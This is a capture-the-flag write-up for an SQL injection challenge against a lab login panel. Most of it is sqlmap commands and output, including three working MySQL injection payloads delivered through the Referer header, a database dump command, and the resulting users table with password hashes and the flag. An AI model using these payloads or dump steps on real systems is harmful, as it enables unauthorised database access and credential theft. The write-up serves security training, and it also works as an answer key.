Injection (silver, 100p)
You have found a login panel at https://10.XX.32.95:1003/,
You suspect there could be an SQL injection.
You have to find it and exploit it.
Find a SQL injection vulnerability in this web application and try to combine different injection methods to extract the flag from the database.
solution
Opening webpage shows a simple login form.
As the task is to find SQL injection, let's run sqlmap.
With default parameters nothing was found, therefore --level was raised.
SQL injection is found in HTTP Referer header.
$ sqlmap --url https://10.XX.32.95:1003/index.php --data 'username=admin&passsword=password' --dbms mysql --level 3
<small>(..)</small>
[18:23:59] [INFO] heuristic (basic) test shows that parameter 'Referer' might be injectable (possible DBMS: 'MySQL')
[18:23:59] [INFO] heuristic (XSS) test shows that parameter 'Referer' might be vulnerable to cross-site scripting (XSS) attacks
(..)
parameter 'Referer' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 2855 HTTP(s) requests:
---
Parameter: Referer (Referer)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: https://10.XX.32.95:1003/index.php' AND 7716=(SELECT (CASE WHEN (7716=7716) THEN 7716 ELSE (SELECT 1251 UNION SELECT 4964) END))-- -
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: https://10.XX.32.95:1003/index.php' AND GTID_SUBSET(CONCAT(0x7162626271,(SELECT (ELT(6685=6685,1))),0x717a6b6271),6685)-- ZBqm
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: https://10.XX.32.95:1003/index.php' AND (SELECT 6307 FROM (SELECT(SLEEP(5)))kXye)-- bpeo
---
[18:38:41] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6Dumping the database, gives the flag.
$ sqlmap --url https://10.XX.32.95:1003/index.php --data 'username=admin&passsword=password' --dbms mysql --level 3 --dump
(..)
Database: cms
Table: users
[8 entries]
+----+--------------------------------------------------------------+-------+---------------+---------------------+-------------------+
| id | hash | ref | username | createdAt | name_lastname |
+----+--------------------------------------------------------------+-------+---------------+---------------------+-------------------+
| 1 | $2y$10$vYsDyf8aeKSEasdasbym.eL5WOd1fAKy9McGsh1gMy5YVORBz8Qyu | / | admin | 2019-09-10 09:56:02 | Admin Doe |
| 2 | $2y$10$vYsDyf8aeKSEasdasbym.eL5WOd1fAKy9McGsh1gMy5YVORBz8Qyu | / | manager | 2019-09-10 09:56:10 | Manager Doe |
| 3 | $2y$10$vYsDyf8aeKSEasdasbym.eL5WOd1fAKy9McGsh1gMy5YVORBz8Qyu | / | tester | 2019-09-10 09:56:11 | Tester Doe |
| 4 | $2y$10$vYsDyf8aeKSEasdasbym.eL5WOd1fAKy9McGsh1gMy5YVORBz8Qyu | / | administrator | 2019-09-10 09:56:12 | Administrator Doe |
| 5 | $2y$10$vYsDyf8aeKSEasdasbym.eL5WOd1fAKy9McGsh1gMy5YVORBz8Qyu | / | boss | 2019-09-10 09:56:13 | Boss Doe |
| 6 | $2y$10$vYsDyf8aeKSEasdasbym.eL5WOd1fAKy9McGsh1gMy5YVORBz8Qyu | / | analyst | 2019-09-10 09:56:23 | Analyst Doe |
| 7 | $2y$10$vYsDyf8aeKSEasdasbym.eL5WOd1fAKy9McGsh1gMy5YVORBz8Qyu | / | user | 2019-09-10 09:56:22 | User Doe |
| 8 | 1764c742865ee6afd0778e676e80c32d | / | Flag | 2019-09-10 09:56:47 | Flag Doe |
+----+--------------------------------------------------------------+-------+---------------+---------------------+-------------------+